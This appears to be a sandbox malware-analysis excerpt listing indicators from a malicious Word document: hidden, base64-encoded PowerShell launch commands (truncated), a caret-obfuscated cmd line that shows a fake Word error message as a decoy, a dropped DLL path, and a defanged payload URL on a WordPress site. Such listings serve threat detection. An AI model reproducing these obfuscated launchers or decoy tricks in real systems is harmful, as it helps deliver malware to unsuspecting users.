Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IABTAEUAVAAtAEkAdABFAG0AIAB2AEEAUgBpAEEAQgBMAGUAOgBzAFcAUQB1AHgAIAAoACAAWwBUAFkAcABFAF0AKAAiAHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAG8ALgBEAGkAUgBFAEMA...
- %HOMEPATH%\kn94rj8\jmso8vc\u30k.dll
- http://www.au##tra.com/wp-admin/Logs/
- DNS ASK au##tra.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABTAEUAVAAtAEkAdABFAG0AIAB2AEEAUgBpAEEAQgBMAGUAOgBzAFcAU...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.